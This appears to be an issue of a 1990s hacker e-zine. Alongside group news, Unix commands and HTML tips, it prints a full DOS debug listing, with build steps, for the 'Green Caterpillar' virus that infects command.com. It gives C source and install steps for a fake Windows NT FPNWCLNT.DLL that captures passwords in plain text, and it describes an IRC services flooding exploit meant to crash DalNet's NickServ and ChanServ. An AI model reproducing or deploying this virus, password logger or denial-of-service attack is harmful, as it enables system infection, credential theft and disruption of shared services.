

अग्नि Magazine

Issue 3

Table of Contents

Ayurveda Information	2
Agni Publications News	2
Ayurveda Member List	3
Ayurveda Application	4
Debug Code of a Computer Virus	6
The Free Software Foundation	10
Stuff for Windows NT Fans.	10
C Code-NickServ.C	12
TCP/IP Introduction	13
HTML Tricks	13
A Look At "ZipSlack"	14
UNIX: Do you know it?	14
Software Reviews	16
The Computer and Fraud Abuse Act of 1986	16
The Windows 98 Registration Wizard	19
Newbie Note	20
New Email Bug	20
Email: Dear Haze	21
Recommended Reading	22
Web Design-Get on the web!	23
Possible Things to Come	23
Special Thanks	24

Welcome to Agni Magazine #3

Well, that "new look" I've been talking about it slowly coming into play. I even added an about on the menu bar, I figured it looked nicer. I'm sorry to all of you, because that HTML Crash Code decided to disappear from my hard drive. If I get some time and remember what I wrote - you'll get it.... The web site is still up <http://quantech.ml.org/agni>. The site's OS has been getting some upgrades, so it may be down for a little while. Like everything, just give it a little time. Do any of you out there know anything about help file design? Are you very familiar with the design of them and help file macros? If so I have some questions for you. Please email Agni_Magazine@hotmail.com and use the subject of "Help file development."

Disclaimer

The following states that all of the information that Agni Computer Security Technologies provides and everything therefore withheld in the magazine and/or done by Agni is for intellectual growth for everyone out there interest in computer security or the general operations of a computer system. Nothing that Agni Computer Security Technologies ever provides to the public will be for the purpose of illegal activities by the readers of the magazine. Thus Agni, it's writer's and editors, or the Web domain that may be currently hosting their site, take no responsibility for any personal actions it's readers my take which my involve the use of this material towards illegal activities. You are responsible for your own actions, and I am responsible of mine.

If you disagree - delete it. If you agree then, enjoy it.

Ayurveda Information

Well, for those of you looking around for the art release of Ayurveda, stop looking. Ayurveda has not released yet due to some major technical problems. They always say that the first release is the hardest. A lot of things have been put on hold for right now, but will soon be up and running. Devatas Dharma will be leaving town soon, which will make things even more difficult. Besides all that, everything is basically the same. We do have a new member, Cobalt-60. Cobalt-60, I must say is an excellent artist, you'll see his work on both the Ayurveda Packs, the Agni Magazine site, and even in Agni Magazine. We are also currently reviewing 4 other applications and those members may be on the list next month. The Ayurveda website will be up soon, I'll notify you about all that. We still are taking applications so if you want to apply to Ayurveda, don't be scared to, I'll be reading all the applications personally. But, that's about it for right now on the Ayurveda Info.

Note To Ayurveda Applicants: Ayurveda supports just about everything. It's not some hacker group, cracker group, or anything solid. It is a group of people with an advanced knowledge of computers in several fields. So if you know it, and you know it well, we want to know you.

Agni Publications News

Well, the website is still there. It goes up and down, so if it's not there when you try to go to it try a little later. I'm working on some graphics for the magazine right now, and all those should be ready by the time the next issue comes around. I've been working on a new look a little, I hope you enjoy the new pop ups and everything, I figured that might be a little easier for you. In issue #4 I will be placing some of the members literature in one article. It's slightly askew from the normal format, I know, but I figured it is still something that Ayurveda does and something I have found that the computer underground seems to enjoy. So for issue #4 look out for the Ayurveda Literature article, and yes, some of the literature will be written by me also... Ayurveda Literature will be mostly poetry, but basically whatever the members give me. Lately, Agni Magazine hasn't been coming out on a monthly basis, but more of a whenever I have the time basis. That's basically how it's going to be for right now. I'm the only writer for this magazine, plus I'm the only one that does the help file design. But, I'm trying to get them out to you all as fast as I can. I'm also going to be putting out another version (maybe) of the magazine in plain text for those of you not running Windows 95 (I hope there are still some of you out there) that way you can still read the magazine, that goes for all the past issues as well... Both versions with then be available for download at the website. For right now, I hope your enjoying the magazine, and remember that your comments and suggestions are welcome at: Agni_Magazine@hotmail.com.

In issue #4 I will be placing some of the members literature in one article.

Ayurveda Member List

Devatas Dharma - Founder

Art

Haze Inferno - President

Art, Coordinator of Agni Magazine, Coordinator of Packs, Programmer, Courier, Literature.

Cobalt-60

Art, Modding, Literature

Darkside

Art, Web host and FTP site operator, Programmer, Courier.

Dominus

Art, Courier, Literature.

Kakola Sengupta

Art and Literature

Ivanneth Elemmirö

Art and Literature

Mordack

FTP Site Operator, Courier.

Tekrat-

Courier

Unright

Courier.

*Applicants please see
the next article for
application
information.*

Ayurveda Application

This is a very small and basic App, but it covers the important stuff. Please paste the following information in a text document and email it to ayurveda_grp@hotmail.com with the subject text "APPLICATION."

Handle:

Last Name: First Name:

Age:

Email:

1. Voice Phone #: (don't go thinking I'm going to call you, but in case I can't get a hold of you any other way.)
2. Internet Connection Speed: (28.8, 33.6, 56K, Cable modem, ISDN, T1, T3)
3. How many years have you been in the computer scene?
4. What do you do?
 - Art (ANSI, ASCII, Rip, S/VGA)
 - Webmaster/SiteOp (http, ftp, UNIX/telnet)
 - Exotic or little know Information Systems
 - Botmaster
 - Programmer (Visual Basic, C/C++, HTML/Java/CGI, PERL, other)
 - Courier (approx. _____M per day).
 - Privacy
 - Literature (Stories, Hacking Text, Poetry)
 - Security/Information Hacking (UNIX, Windows95/98/NT, Novell, Other)
 - Other_____
5. Please state any of your other "talents" (does not have to be computer related).
6. How do you believe you would be able to help Ayurveda--What do you offer?
7. Do you have any past group experience? Which group? (If it is a major group, your reference will be checked into).
8. Interests that you would like to learn by joining (Computer Languages, OSs, Software, anything).

Rules Before Applying:

1. Don't depend on tools to do the work for you.
2. If you have a problem with someone in the group - come to me - don't fight over stupid shit.
3. Information is free - Just tell them.

People come to us because they are pushed out by the norm and sometimes their families and peers, so we can't push them away too, or we'd be just as wrong.

By turning in this application you agree to the following statements.

Thank You for your application please email it to the about email address, you will be notified ASAP.

Haze Inferno

Debug Code for the "Green Caterpillar" Virus

***** WARNING THIS IS A COMPUTER VIRUS*****

Do not attempt to assemble this program to do harm to the systems of others, the purpose of me publishing this code is to only further the knowledge of my readers about computer viruses, assembly language, and the debug program.

Paste this code to a text file called green.txt.

Then at the MS-DOS Prompt type: "debug < green.txt" in the same directory as green.txt.

You will then make a file called 1575-d.com, and there's your virus.

<-----begin code----->

```
n 1575-d.com
e 0100 0E 8C C8 05 3F 00 50 B8 00 01 50 CB 00 00 00 00
e 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
```

```

e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

e 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04E0 00 00 00 00 00 00 00 00 8B 07 2E FF 36 F8 07 2E
e 04F0 EB 4A 90 60 14 34 02 53 FF 00 F0 CD 20 00 00 00
e 0500 00 00 00 00 00 00 00 7E A4 0A 03 00 01 00 00 00
e 0510 01 0A 03 00 00 9C 0E 00 00 60 36 05 00 AA 43 B5
e 0520 9A 97 03 00 40 89 0E B4 0D 7A 04 71 EA 56 34 02
e 0530 00 00 00 00 78 F8 00 F0 5C 07 70 00 06 1E 8C C0

e 0540 0E 1F 0E 07 A3 35 01 8C D0 A3 2B 01 B0 02 E6 20
e 0550 FC 33 C0 8E D8 33 F6 BF 3C 01 B9 10 00 F2 A4 1E
e 0560 17 BD 08 00 87 EC E8 4C 00 E9 C6 03 E8 5D 04 E8
e 0570 AB 00 74 0E A0 24 07 50 E8 13 01 58 A2 24 07 EB
e 0580 13 90 E8 76 02 E8 95 02 80 3E 24 07 00 75 05 B8
e 0590 00 4C CD 21 80 3E 24 07 43 75 31 1F 07 0E 1F 07
e 05A0 06 BF 00 01 BE 0B 01 B9 0C 00 F2 A4 06 1F B8 00
e 05B0 01 50 33 C0 CB BE 06 00 AD 3D 92 01 74 DD 3D 79
e 05C0 01 75 03 E9 A9 00 3D DC 01 74 01 C3 1F 07 2E 8B

e 05D0 1E 19 01 2E 2B 1E 31 01 8C C8 2B C3 8E D0 2E 8B
e 05E0 2E 33 01 87 EC 2E 8B 1E 21 01 2E 2B 1E 23 01 8C
e 05F0 C8 2B C3 50 2E A1 25 01 50 CB 23 1A 3C 23 2F 2D

```

e 0600 2D 21 2E 24 0E 23 2F 2D E0 41 3A 31 35 37 35 2D
e 0610 44 2E 43 4F 4D 00 00 00 24 24 24 24 24 B8 02 3D
e 0620 BA 19 02 CD 21 73 02 F8 C3 A3 2B 01 BA 73 06 B8
e 0630 24 25 CD 21 B8 02 42 8B 1E 2B 01 B9 FF FF BA FE
e 0640 FF CD 21 BA 7D 02 B4 3F 8B 1E 2B 01 B9 02 00 CD
e 0650 21 B4 3E CD 21 1E 8B 16 39 01 A1 37 01 8E D8 B8

e 0660 24 25 CD 21 1F 81 3E 7D 02 0C 0A F8 C3 00 00 3D
e 0670 2D 02 74 1A 1E 07 0E 1F A1 2B 01 8E D0 87 EC BE
e 0680 3C 01 BF 00 00 B9 10 00 FC F2 A4 E9 DE FE B0 43
e 0690 A2 24 07 B0 08 E6 70 E4 71 A2 3B 01 BA 19 02 B8
e 06A0 02 3D CD 21 73 01 C3 A3 2B 01 BA 0B 01 8B 1E 2B
e 06B0 01 B9 0C 00 B4 3F CD 21 B8 02 42 33 C9 33 D2 CD
e 06C0 21 50 05 10 00 25 F0 FF 50 D1 E8 D1 E8 D1 E8 D1
e 06D0 E8 BF 1F 03 AB 58 5B 2B C3 B9 27 06 03 C8 BA 00
e 06E0 01 2B D0 8B 1E 2B 01 B4 40 CD 21 B8 00 42 33 C9

e 06F0 33 D2 CD 21 B4 40 8B 1E 2B 01 B9 0C 00 BA 1B 03
e 0700 CD 21 B4 3E 8B 1E 2B 01 CD 21 C3 0E 8C C8 05 3F
e 0710 00 50 B8 00 01 50 CB B0 45 A2 24 07 B0 08 E6 70
e 0720 E4 71 A2 3B 01 BA 19 02 B8 02 3D CD 21 73 01 C3
e 0730 A3 2B 01 BA 0B 01 8B 1E 2B 01 B9 18 00 B4 3F CD
e 0740 21 B8 02 42 B9 00 00 BA 00 00 CD 21 50 05 10 00
e 0750 83 D2 00 25 F0 FF 89 16 27 01 A3 29 01 B9 27 07
e 0760 81 E9 00 01 03 C1 83 D2 00 B9 00 02 F7 F1 40 A3
e 0770 0F 01 89 16 0D 01 A1 21 01 A3 23 01 A1 1F 01 A3

e 0780 25 01 A1 19 01 A3 31 01 A1 1B 01 A3 33 01 8B 16
e 0790 27 01 A1 29 01 B9 10 00 F7 F1 2D 10 00 2B 06 13
e 07A0 01 A3 21 01 A3 19 01 C7 06 1F 01 00 01 C7 06 1B
e 07B0 01 00 01 B8 00 42 33 C9 BA 02 00 CD 21 BA 0D 01
e 07C0 8B 1E 2B 01 B9 16 00 B4 40 CD 21 B8 02 42 33 C9
e 07D0 33 D2 CD 21 BA 00 01 A1 29 01 59 2B C1 2B D0 B9
e 07E0 27 07 03 C8 81 E9 00 01 B4 40 CD 21 B4 3E CD 21
e 07F0 C3 51 B9 00 00 B4 4E CD 21 59 C3 06 B8 1C 35 CD
e 0800 21 2E 89 1E 07 01 2E 8C 06 09 01 B8 21 35 CD 21

e 0810 06 58 2E A3 05 01 2E 89 1E 03 01 07 C3 50 06 1E
e 0820 33 C0 8E C0 BE 86 00 26 8B 04 8E D8 BE 25 07 81
e 0830 3C 0C 0A 75 09 1E 58 E8 B7 01 1F 07 58 C3 0E 1F
e 0840 A1 35 01 48 8E C0 26 80 3E 00 00 5A 74 03 EB 44
e 0850 90 26 A1 03 00 B9 37 07 D1 E9 D1 E9 D1 E9 D1 E9
e 0860 2B C1 72 30 26 A3 03 00 26 29 0E 12 00 0E 1F 26
e 0870 A1 12 00 50 07 BE 00 01 56 5F B9 27 06 FC F2 A4
e 0880 06 2B C0 8E C0 BE 84 00 BA A8 04 26 89 14 46 46
e 0890 58 26 89 04 1F 07 58 C3 3C 57 75 03 EB 1E 90 80

e 08A0 FC 1A 75 06 E8 17 01 EB 13 90 80 FC 11 75 04 E8
e 08B0 0F 00 CF 80 FC 12 75 04 E8 C1 00 CF 2E FF 2E 03
e 08C0 01 B0 57 CD 21 50 51 52 53 55 56 57 1E 06 0E 1F
e 08D0 0E 07 2E C6 06 CD 05 00 90 E8 18 00 75 0C E8 3C
e 08E0 FD 74 07 E8 54 01 FE 0E CD 05 07 1F 5F 5E 5D 5B
e 08F0 5A 59 58 C3 0E 07 0E 07 FC E8 36 00 73 04 83 FF
e 0900 00 C3 BF 19 02 B0 2E B9 0B 00 F2 AE 81 3D 43 4F
e 0910 75 0D 80 7D 02 4D 75 07 C6 06 24 07 43 90 C3 81

```

e 0920 3D 45 58 75 0C 80 7D 02 45 75 06 C6 06 24 07 45

e 0930 90 C3 1E 2E 8B 36 2D 01 2E A1 2F 01 8E D8 BF 19
e 0940 02 AC 3C FF 75 07 83 C6 06 AC EB 08 90 3C 05 72
e 0950 03 1F F9 C3 B9 0B 00 3C 00 74 06 04 40 AA B0 3A
e 0960 AA AC 3C 20 74 04 AA EB 0B 90 26 80 7D FF 2E 74
e 0970 03 B0 2E AA E2 EB B0 00 AA 1F F8 C3 B0 57 CD 21
e 0980 50 51 52 53 55 56 57 1E 06 0E 1F 0E 07 2E 80 3E
e 0990 CD 05 00 74 03 EB 1C 90 E8 59 FF 75 16 E8 7D FC
e 09A0 74 11 E8 95 00 FE 0E CD 05 07 1F 5F 5E 5D 5B 5A
e 09B0 59 58 C3 07 1F 5F 5E 5D 5B 5A 59 58 C3 00 50 1E

e 09C0 58 2E A3 2F 01 2E 89 16 2D 01 58 C3 0E B0 00 E6
e 09D0 20 B8 24 35 CD 21 89 1E 39 01 8C C3 89 1E 37 01
e 09E0 07 BE 0A 02 BF 19 02 B9 0F 00 AC 04 20 AA E2 FA
e 09F0 C3 50 0E 1F 0E 07 8A 1E 3B 01 80 FB 0C 77 39 80
e 0A00 FB 00 74 34 B0 08 E6 70 E4 71 3C 0C 77 2A 3C 00
e 0A10 74 26 3A C3 74 22 FE C3 E8 14 00 3A C3 74 19 FE
e 0A20 C3 E8 0B 00 3A C3 74 10 1F E8 3A 00 0E 1F C3 80
e 0A30 FB 0C 76 03 80 EB 0C C3 58 C3 BA 73 06 B8 24 25
e 0A40 CD 21 80 3E 24 07 43 75 06 E8 42 FC EB 04 90 E8

e 0A50 C5 FC 1E 8B 16 39 01 A1 37 01 8E D8 B8 24 25 CD
e 0A60 21 1F C3 B0 03 CF BA B0 06 B8 1C 25 CD 21 C6 06
e 0A70 B0 06 90 90 B8 00 B8 8E C0 BF A0 0F B8 20 07 B9
e 0A80 0B 00 F2 AB 0E 07 C3 00 00 00 20 07 0F 0A 0F 0A
e 0A90 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A F7 0E EE 0C
e 0AA0 90 FB 50 51 52 53 55 56 57 1E 06 0E 1F EB 0B 90
e 0AB0 07 1F 5F 5E 5D 5B 5A 59 58 CF B8 00 B8 8E C0 E8
e 0AC0 2B 00 BE 9A 06 B9 16 00 F2 A4 80 3E AE 06 EE 74
e 0AD0 08 C6 06 AE 06 EE EB 06 90 C6 06 AE 06 F0 26 8B

e 0AE0 05 B4 0E A3 9A 06 C6 06 99 06 00 EB C3 BF 00 00
e 0AF0 BE 9C 06 57 B9 12 00 FC F3 A6 5F 74 0B 47 47 81
e 0B00 FF A0 0F 75 EB BF 00 00 81 FF 9E 0F 75 05 C6 06
e 0B10 B0 06 CF C3 43 0C 0A

rcx
0A17
w
q
<-----end code----->

```

What does it do? Infects command.com, in DOS - you have a nice little green caterpillar crawling around. Looks like this... ***** every time you go into DOS. Crawls up - down, and side to side.

The Free Software Foundation

Free Software? Not pirated? That's right, people actually develop software for you to use, and you don't have to pay for it. Not stupid ass shareware that has a 30 trial. To you Windows 95/98 users, I'm sorry... because the software is for the Linux/Unix platform. For you Windows users, why don't you try reading the article on ZipSlack, it may be of major interest to you. As for you Linux/Unix users, you can find The Free Software Foundation at <http://www.fsf.org>.

When this software site was reviewed no Windows software was on there, that doesn't mean there will not be any on there now... Go check it out anyway.

Not a true lengthy article, I know. It gets to the point, and now you know where the hell to get free software.

More Stuff For You Window NT fans

Well, after last issue when I published those few Windows NT exploits I was asked to publish more stuff.. I sighed, and then went on searching for more ways to exploit an NT machine. So I came across this little piece of information. The registry includes a default entry for: <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa> which has a value <Notification Packages: REG_MULTI_SZ: FPNWCLNT>. This is a DLL which normally exists only in an NetWare environment. A false FPNWCLNT.DLL can be stored in the %systemroot%\system32 directory which collects passwords in plain text.

So here is a nice little code for a false FPNWCLNT.DLL
Compile the below C code and .DEF file into a .dll file called fpnwclnt.dll and copy it to %systemroot%\system32.

```
<-----Begin Code----->
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

struct UNI_STRING {
USHORT len;
USHORT maxlen;
WCHAR *buff;
};

static HANDLE fh;

BOOLEAN __stdcall InitializeChangeNotify ()
{
DWORD wrote;
fh = CreateFile("C:\\temp\\pwdchange.out",
GENERIC_WRITE,

FILE_SHARE_READ|FILE_SHARE_WRITE,
0,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH,
0);
WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0);
return TRUE;
}
```

```
LONG __stdcall PasswordChangeNotify (
struct UNI_STRING *user,
ULONG rid,
struct UNI_STRING *passwd
)
{
DWORD wrote;
WCHAR wbuf[200];
char buf[512];
char buf1[200];
DWORD len;

memcpy(wbuf, user->buff, user->len);
len = user->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);

sprintf(buf, "User = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

memcpy(wbuf, passwd->buff, passwd->len);
len = passwd->len/sizeof(WCHAR);
wbuf[len] = 0;
wcstombs(buf1, wbuf, 199);
sprintf(buf, "Password = %s : ", buf1);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

sprintf(buf, "RID = %x\n", rid);
WriteFile(fh, buf, strlen(buf), &wrote, 0);

return 0L;
}
<-----End Code----->
```

And yes, I've got more NT tricks in my box... Look out for issue #4..... The premiere of the "new look"..... hopefully.

C Code—Nickserv.c

The author's name is below. I did not right this program.

Program: NickServ.C
Author: Greg|tantruM <graff@mkp.ml.org>

Based on idea by Commando

Based on sheep.c by nyt <nyt@deadpig.org>

This program exploits the database memory error bug in DalNet's Nickname Services (nickserv for short).

NickServ works like this... It takes a registration request from a User on DalNet, stores it and the password to a database file.. After a specific amount of time, It rereads that database file... The idea of this is that NickServ will have a place to store these nicks without wasting memory. That's where this exploit comes in.

NickServ.C will send hundreds and hundreds of clones to flood the NickServ before it resyncs... Not only will NickServ lag, it will register each nick into its database, well.. When you fill a bag with double the amount of dirt that the bag can hold, the bag will overflow.. NickServ resyncs and reads the database file and stores all those nicks in its memory, when you have 100 nicks on dalnet stored (they don't expect you to give them many registrations), its ok.. but when you have Thousands of nicks stored at once and re-read at once, It overloads the NickServ's resync code because it runs out of memory. When this happens, NickServ will give up and segmentation fault and die. Now the most interesting thing about this is that NickServ is ran off the same service as the rest of the DalNet services (chanserv etc.)

When NickServ dies, so does chanserv, leaving channels open for takeovers and hell.

I thank nyt for his help, I give greets to omen, and scarface_, I give Osek and Commando credit for their previous work exploiting this bug.

This is a program built to better serve the DalNet community by helping the IRC Administrators see that there is a serious problem in there services, I am not responsible for jack shit, ok? Have a nice day.

- Greg^ (graff@mkp.ml.org)

Yavo Slavenski and Agni Computer Security Technologies also would like to note that by placing this information in the magazine it is noted to be for informational use only, and no responsibility is then placed on us for any wrongdoing of the readers—so don't be a damn idiot.

Please Refer to the Agni Magazine #3 page at www.acst.org for the program source code.

NICKSERV.C

An Introduction to TCP/IP and other Protocols

This article has been removed from this issue of the magazine due to copyright issues by the original author of the publication. Please keep an eye out for the highly detailed tutorial by Agni Computer Security Technologies on TCP/IP coming soon.

Sorry for any inconvenience.

Yavo Slavenski

HTML Tricks

Ok, this is basically a little article that shows you a few fun ways to play with HTML. You will learn everything from flashing colors to onmouseover and more.. I have seen so many of these techniques done using CGI scripts, which is totally unnecessary.

1. Here is a simple code that make a shit load of colors flash when the mouse hovers over the link.

```
<a href=""onmouseover="document.bgColor='blue';document.bgColor='blue';document.
bgColor='b
lue';document.bgColor='green';document.bgColor='green';document.
bgColor='yellow';documen

t.bgColor='purple';document.bgColor='orange';document.bgColor='orange';document.
bgColor=
'blue';document.bgColor='blue';document.bgColor='blue';document.bgColor='green';
document
.bgColor='green';document.bgColor='yellow';document.bgColor='purple';document.
bgColor='or
ange';document.bgColor='blue';document.bgColor='blue';document.bgColor='blue';
document.b
gColor='green';document.bgColor='green';document.bgColor='yellow';document.
bgColor='purp
le';document.bgColor='orange';document.bgColor='blue';document.bgColor='blue';
document.b

gColor='blue';document.bgColor='green';document.bgColor='green';document.
bgColor='yellow
';document.bgColor='purple';document.bgColor='orange';document.bgColor='blue';
document.b
gColor='blue';document.bgColor='blue';document.bgColor='green';document.
bgColor='green';d
ocument.bgColor='yellow';document.bgColor='purple';document.bgColor='orange';
document.bg
Color='blue';document.bgColor='blue';document.bgColor='blue';document.
bgColor='green';doc
ument.bgColor='green';document.bgColor='yellow';document.bgColor='purple';
document.bgCol

or='orange';document.bgColor='blue';document.bgColor='blue';document.
bgColor='blue';docu
ment.bgColor='green';document.bgColor='green';document.bgColor='yellow';
document.bgColor
='purple';document.bgColor='white';">Link Name Here</a>
```

2. Ok, here is one that will change the background to one color, but only while the mouse is over the link.

```
<a href=""onMouseOver="document.bgColor='green'"
onMouseOut="document.bgColor='white'">Link Name Here</a>
```

3. Here is one in which you select the color you desire by a section of select circles.

```
Green<INPUT TYPE="radio" NAME="radio" onClick="document.bgColor='green'">
White<INPUT TYPE="radio" NAME="radio" onClick="document.bgColor='white'">
```

A Quick Look At "ZipSlack".

Originating from a letter sent into the Happy Hacker Digest, called More on Linux.

From: Adrian Hawkins <HAWKINS@us.oracle.com >

A man by the name of Patrick Volkerding has recently put together a version of Slackware called ZipSlack. This version of Linux simply unzips onto a Zip™ disk or HD. Using UMSDOS, users don't have to worry about partitioning their drives or buying more hardware. All you do is make another directory. To run, the user then has to type "Linux" at a DOS command prompt.

Although, I don't normally quote from the Happy Hacker, someone sent this to me and it sounded interesting. You do truly get a great version of Slackware when your running ZipSlack. It's all there for you, even without the hassle of partitioning of buying new hardware. I (Haze Inferno) have personal used this version of Slackware. I think it has a wonderful design for all the people that don't enjoy the time it takes to add another hard drive of repartition there current drive. The best thing about it, is that if you have the time to download it, all Linux is free.

Available now at any Slackware site.

UNIX: Do you know it?

Ok, in this article I'm discussing Unix/Linux for those of you out there that currently don't know how to use the OS. For those of you that do, I doubt I would waste the time reading this being it's 100% for Unix newbies. But you may find the command list useful.

Personally, I enjoy slackware myself, which is available for download at <ftp.cdrom.com/pub/linux/slackware/> ... or something like that. There are a lot of commands that one could know for the Unix operating system, just like DOS - it has tons. Just to let you know, this will be a small serious of articles for about 3 or 4 issues, I don't think I can write one article that explains the Unix OS completely.

Commands:

alias	this allows the user to view the current aliases.
awk	this allows the user to search for a pattern within a file.
bdiff	compares two large files
bfs	scans a large file
cal	shows a calendar
cat	concatenates and prints a file
cc	c compiler
cd	changes directories
chgrb	changes a file groups ownership
chmod	changes the permission on a file
chown	changes the individual ownership of a file
cmp	compares to files
comm	compares two files so as to determine which lines are common to both
cp	copies file to another location

cu	calls another unix system
date	returns the date and time
df	shows all mounted drives on your machine
diff	displays the difference between two files
du	shows the disk usage in blocks for a directory
echo	echoes the data to the screen or file
ed	text editor
env	lists the current environment variables
ex	another text editor
expr	evaluates a mathematical formula
find	finds a file
f77	fortran compiler
format	initializes a floppy disk
grep	searches for a pattern within a file
help	gives help
kill	stops a running process
ln	creates a link between two files
lpr	copies the file to the line printer
ls	lists the files in a directory
mail	allows the user to send/receive mail
mkdir	makes directory
more	displays a data file to the screen
mv	used to move or rename files
nohup	allows a command to continue running even when you log out
nroff	used to format text
passwd	changes your password
pkgadd	installs a new process onto your machine
ps	Lists the current processes running
pwd	displays the name of the working directory
rm	removes files
rmdir	removes directories
set	lists all the variables in the current shell
setenv	sets the environment variables
sleep	causes a process to become inactive
source	allows the user to execute a file and update any changed values in that file
sort	sorts files
spell	checks for spelling errors in a file
split	divides a file
stty	sets the terminal options
tail	displays the end of a file
tar	copies all specified files into one
touch	creates an empty file or updates the time/date stamp on a file
troff	outputs formatted output
tset	sets the terminal type
unmask	specify a new creation mask
uniq	compares two files
uucp	unix to unix execute
vi	full screen editor
vipw	opens the vi editor as well as password file for editing
volcheck	checks to see if there is a floppy disk mounted to your machine
wc	displays detail in the full size
who	information on other people online
write	send a message to another user
!	repeats commands

Software Review: Revelation 1.1

This review is that of Snadboy's Revelation 1.1. This software is not only useful, but very interesting. Microsoft finds this software so interesting they even issued a warning about it.. What Revelation does exactly is echo those ***** password to plain text. So for those people that save FTP and Dial-Up Networking password, watch out. I strongly recommend this software to everyone. It helps you remember any lost password that is echoed to another character. It even works on Netscape, and other software. Visual Basic programs that echo things to **** or whatever, are also affected. This software is ingenious, and you'll find yourself loading up programs just to see if it will echo it to plain text.....and it will. It's available at <http://www.snadboy.com>, or you can download while your looking through the Agni website, it's in the download section.

The Computer Fraud and Abuse of 1986

Most of the computer underground knows what the Computer Fraud and Abuse Act of 1986 is, but do they really understand what it states? The Computer Fraud and Abuse Act is available to everyone to copy from you public library, but I figured no one's going to go out of their way to read this thing. That's pretty funny since must of the kids that think they are hackers have never even heard of this federal act. But before I get into the actual act itself, let me show you the current percentages of computer disasters.

Human Error - 55%
 Physical security problems - 20% (e.g., natural disasters, power problems)
 Insider attacks conducted for the purpose of profiting from computer crime- 10%
 Disgruntled employees seeking revenge - 9%
 Viruses - 4%
 Outsider attacks - 1-3%

Isn't that some serious crap. The government tries to takedown hackers by getting 64 Million dollars, yet they should be educating those 55% who keep messing everything up - Rather then searching for 2% of people that are stupid and mess up the system, because they think they're good. This information came to you from the Computer Security Institute.

Now the Computer Fraud and Abuse Act of 1986 is really only two statues: 18 USC, Chapter 47, Section 1029 + Section 1030.

Section 1029

